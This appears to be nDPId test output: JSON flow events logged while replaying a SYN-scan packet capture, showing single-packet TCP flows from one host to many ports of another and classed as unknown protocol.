+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060393,"flow_last_seen":1278275060393,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":847,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 